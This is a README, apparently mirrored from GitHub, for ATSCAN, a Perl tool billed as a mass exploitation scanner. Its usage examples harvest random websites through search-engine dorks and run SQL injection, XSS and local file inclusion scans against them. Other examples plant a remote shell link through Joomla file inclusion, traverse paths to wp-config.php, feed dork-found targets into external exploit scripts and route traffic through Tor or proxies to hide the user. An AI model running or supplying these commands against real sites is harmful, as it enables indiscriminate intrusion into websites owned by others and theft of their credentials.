ATSCAN

Advanced Search / Dork / Mass Exploitation Scanner

Alisam Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent!

Tool:	ATSCAN version 12
Codename:	Anon4t
AUTHOR:	Ali MEHDIOUI
GROUP:	Alisam Technology
FACE:	facebook.com/Alisam.Technology
YOUTUBE:	youtube.com/c/AlisamTechnology
WITTER:	twitter.com/AlisamTechno
PLUS:	plus.google.com/+AlisamTechnology

Description:

Search engine Google / Bing / Ask / Yandex / Sogou
Mass Dork Search
Multiple instant scans.
Mass Exploitation
Use proxy.
Random user agent.
Random engine.
Extern commands execution.
XSS / SQLI / LFI / AFD scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode & Encode Base64 / MD5
Ports scan.
Extract IPs
Extract E-mails.
Auto detect errors.
Auto detect Cms.
Post data.
Auto sequence repeater.
Validation.
Post and Get method
And more...

Libreries to install:

Perl Requiered.
Works in all platforms.

Download:

git clone https://github.com/AlisamTechnology/ATSCAN
OR direct link: https://github.com/AlisamTechnology/ATSCAN

Permissions:

cd ATSCAN
chmod +x ./atscan.pl

Installation:

chmod +x ./install.sh
./install.sh

Execution:

Portable Execution: perl ./atscan.pl
Installed Tool Execution: atscan

Uninstall Tool:

atscan --uninstall

Screenshots:

Help:

--help / -h / -?	Help.
--proxy	Set tor proxy for scans [EX: --proxy "socks://localhost:9050"] Set proxy [EX: --proxy "http://12.45.44.2:8080"] Set proxy list [EX: --proxy list.txt]
-m	Set engine motors default bing EX: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
--proxy-random	Random proxy [EX: --proxy-random list.txt] or --proxy-random "socks://localhost:9050"]
--m-random	Random of all disponibles engines
--b-random	Random all disponibles agents
--freq	Random time frequency (in seconds)
--time	set browser time out
--dork / -d	Dork to search [Ex: house [OTHER]cars [OTHER]hotel]
-t	Target
--level / -l	Scan level (+- Number of page results to scan)
-p	Set test parameter EX:id,cat,product_ID
--save / -s	Output.
--content	Print request content
--data	data. See examples
--post	Use post method
--get	Use get method
--header	Set headers
--host	Domain name [Ex: site.com]
--nobanner	Hide tool banner
--beep	Produce beep sound if positive scan found.
--ifend	Produce beep sound when scan process is finished.
--noinfo	Jump extra results info.
--limit	Limit max positive scan results.
--valid / -v	Validate by string
--status	Validate by http header status
--ifinurl	Get targets with exact string matching
--sregex	Get targets with exact regex matching
--unique	Get targets with exact dork matching
--replace	String to replace
--with	String to replace with
--full	--replace --full Will replace all url parametres from string to the end
--payload	Use your own payloads instead of tool ones
--exp	Exploit/Payload
--sql	Xss scan
--lfi	Local file inclusion
--joomrfi	Scan for joomla local file inclusion.
--shell	Shell link [Ex: http://www.site.com/shell.txt]
--wpafd	Scan wordpress sites for arbitery file download
--admin	Get site admin page
--shost	Get site subdomains
--tcp	TCP port
--udp	UDP port
--sites	Sites in the server
--wp	Wordpress sites in the server
--joom	Joomla sites in the server
--upload	Get sites with upload files in the server
--zip	Get sites with zip files in the server
--md5	Convert to md5
--encode64	Encode base64 string
--decode64	decode base64 string
--TARGET	Will be replaced by target in extern command
--HOST	Will be replaced by host in extern command
--HOSTIP	Will be replaced by host IP in extern command
--PORT	Will be replaced by open port in extern command
--ip	Crawl to get Ips
--regex	Crawl to get strings matching regex
--noquery	Remove string value from Query url [ex: site.com/index.php?id=string]
--command /-c	Extern Command to execute
--email	Get emails
rang(x-y)	EX: --exp "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?id=rang(1-9)" --sql site.com/index.php?id=1 -> 9.
repeat(txt-y)	EX: --exp "/index.php?id=repeat(../-9)wp-config.php" --sql OR -t "site.com/index.php?id=../wp-config.php" In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
[OTHER]	To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
[DATA/DATAFILE]	To separate data values ex: --data "name:username [DATA]email:xxxxxx [DATA]pass:xxxxx/[DATAFILE]pass:file.txt"
--update	Update tool
--tool	Tool info.
--config	User configuration.
--uninstall	Uninstall Tool.

Examples:

PROXY:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: Proxy: --proxy [proxy] [Ex: http://12.32.1.5:8080] or --proxy [list.txt] [Ex: --proxy /root/Desktop/Documents/my_proxies.txt]

  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr><td>    
    <b>RANDOM: </b> <br/>
    Random proxy --proxy-random [proxy  list.txt] <br/>
    Random browser --b-random <br/>
    Random engine --m-random <br/>
  </td></tr></table>
  
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr><td>    
   <b>SET HEADERS:</b> <br/>
   atscan --dork [dork / dorks.txt] --level [level] --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1" <br/>
   atscan -t <target> --data "name:userfile[DATAFILE]value:file.txt --post --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1"
  </td></tr></table>
  
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr><td>    
  <b>SEARCH ENGINE: </b> <br/>
   Search: atscan --dork [dork> --level [level]  <br/>
   Search: atscan -d [dork> -l [level]  <br/>
   Set engine: atscan --dork [dork> --level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all] <br/>
   Set selective engines: atscan -d [dork> -l [level] -m 1,2,3.. <br/>
   Search with many dorks: atscan --dork [dork1 [OTHER]dork2 [OTHER]dork3> --level [level]    <br/>
   Search and rand: atscan -d [dork] -l [level] --exp "/index.php?id=rang(1-9)" --sql   <br/>
   Get Server sites: atscan -t [ip] --level <value> --sites <br/>
   Get Server sites: atscan -t "[ip from]-[ip to]" --level <value> --sites <br/>
   Get Server sites: atscan -t "ip1 [OTHER]ip2" --level <value> --sites <br/>
   
   Get Server wordpress sites: atscan -t [ip] --level <value> --wp  <br/>
   Get Server joomla sites: atscan -t [ip] --level <value> --joom  <br/>
   Get Server upload sites: atscan -t [ip] --level <value> --upload  <br/>
   Get Server zip sites files: atscan -t [ip] --level <value> --zip  <br/>
   WP Arbitry File Download: atscan -t [ip] --level <value> --wpafd  <br/>
   Joomla RFI: atscan -t [ip] --level [10] --joomfri --shell <shell link> <br/>
   Search + output: atscan --dork [dorks.txt] --level [level] --save <br/>
   Search + get emails: atscan -d [dorks.txt] -l [level] --email  <br/>
   Search + get site emails: atscan --dork <site:site.com> --level [level] --email  <br/>
   Search + get ips: atscan --dork [dork> --level [level] --ip 
  </td></tr></table>
  
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr><td>    
   <b>REGULAR EXPRESSIONS: </b> <br/>
   Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex] <br/>
   IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)) <br/>
   E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'
  </td></tr></table>
  
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr><td>    
   <b>REPEATER:</b> <br/>
   atscan -t site.com?index.php?id=rang(1-10) --sql <br/>
   atscan -t [target] --exp "/index.php?id=rang(1-10)" --sql <br/>
   atscan -t [target] --exp "/index.php?id=repeat(../-9)wp-config.php"
  </td></tr></table>
  
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr><td>    
   <b>PORTS</b> <br/>
   atscan -t [ip] --port [port] [--udp / --tcp] <br/>
   atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp] <br/>
   atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"
  </td></tr></table>
  
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr><td>    
   <b>ENCODE / DECODE:</b> <br/>
   Generate MD5: --md5 [string] <br/>
   Encode base64: --encode64 [string] <br/>
   Decode base64: --decode64 [string]
  </td></tr></table>
  
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr><td>    
   <b>DATA:</b> <br/>
   Post data: atscan -t [target] --data "field1:value1 [DATA]field2:value2 [DATA]field3:value3" [--post / --get]<br/>
   Wordlist:  atscan -t [target] --data "name:userfile [DATAFILE]value:file.txt" [--post / --get]<br/>
              atscan -t [target] --data "username:john [DATA]pass:1234" [--post / --get]<br/>
   Post + Validation: --data "name:userfile [DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]
  </td></tr></table>

  
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr><td>    
   <b>EXTERNAL COMMANDES:</b> <br/>
   atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET" <br/>
   atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"  <br/>
   atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP"  <br/>
   atscan -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2 --command "php WP-dl-skin.php-exploit.php --TARGET" <br/>
  </td></tr></table>
  
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr><td>
   <b>MULTIPLE SCANS: </b><br/>
   atscan --dork [dork> --level [10] --sql --lfi --wp ..<br/>
   atscan --dork [dork> --level [10] --replace [string] --with [string] --exp [payload] [--sql / --lfi / --wp /...]<br/>
   atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]<br/>
   atscan -t [target] [--sql / --lfi / --wp /...]</td></tr></table> 
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr>
   <td>
   <b>USER PAYLOADS: </b><br/>
   atscan --dork [dork] --level [10] [--lfi | --sql ..] --payload [payload | payloads.txt]
   </td></tr></table>           
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr>
   <td>
   <b>SEARCH VALIDATION: </b><br/>
   atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string] <br/>
   atscan -d [dork / dorks.txt] -l [level] --ifinurl [string] <br/>
   atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string] <br/>
   atscan -d [dork / dorks.txt] -l [level] --unique </td></tr></table>     
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr>
   <td>
   <b>SCAN VALIDATION: </b><br/>
   atscan -t [target / targets.txt] [--status [code] / --valid [string] <br/>
   atscan -d [dork / dorks.txt] -l [level] --exp [payload] --status [code] / --valid [string] <br/>
   atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --status [code] / --valid [string] <br/>
   atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string] <br/>  
   atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --status [code] / --valid [string] <br/>
   atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --full --status [code] / --valid [string] <br/>
   atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --exp [payload] --status [code] / --valid [string] <br/>
   atscan --data "name:userfile[DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]<br/>
   
   atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string] <br/>
  </td></tr></table>     
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr>
    <td>
     <b>UPDATE TOOL:</b> <br/> 
     atscan --update
  </td></tr></table>     
  <table border="0" cellpadding="2" cellspacing="5" width="100%"><tr>
    <td>
    <b>UNINSTALL TOOL: </b><br/>     
    atscan --uninstall
   </td></tr></table>     
</td>

tiagommourao / atscan Goto Github PK

atscan's Introduction

ATSCAN

atscan's People

Contributors

Watchers

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent

Jobs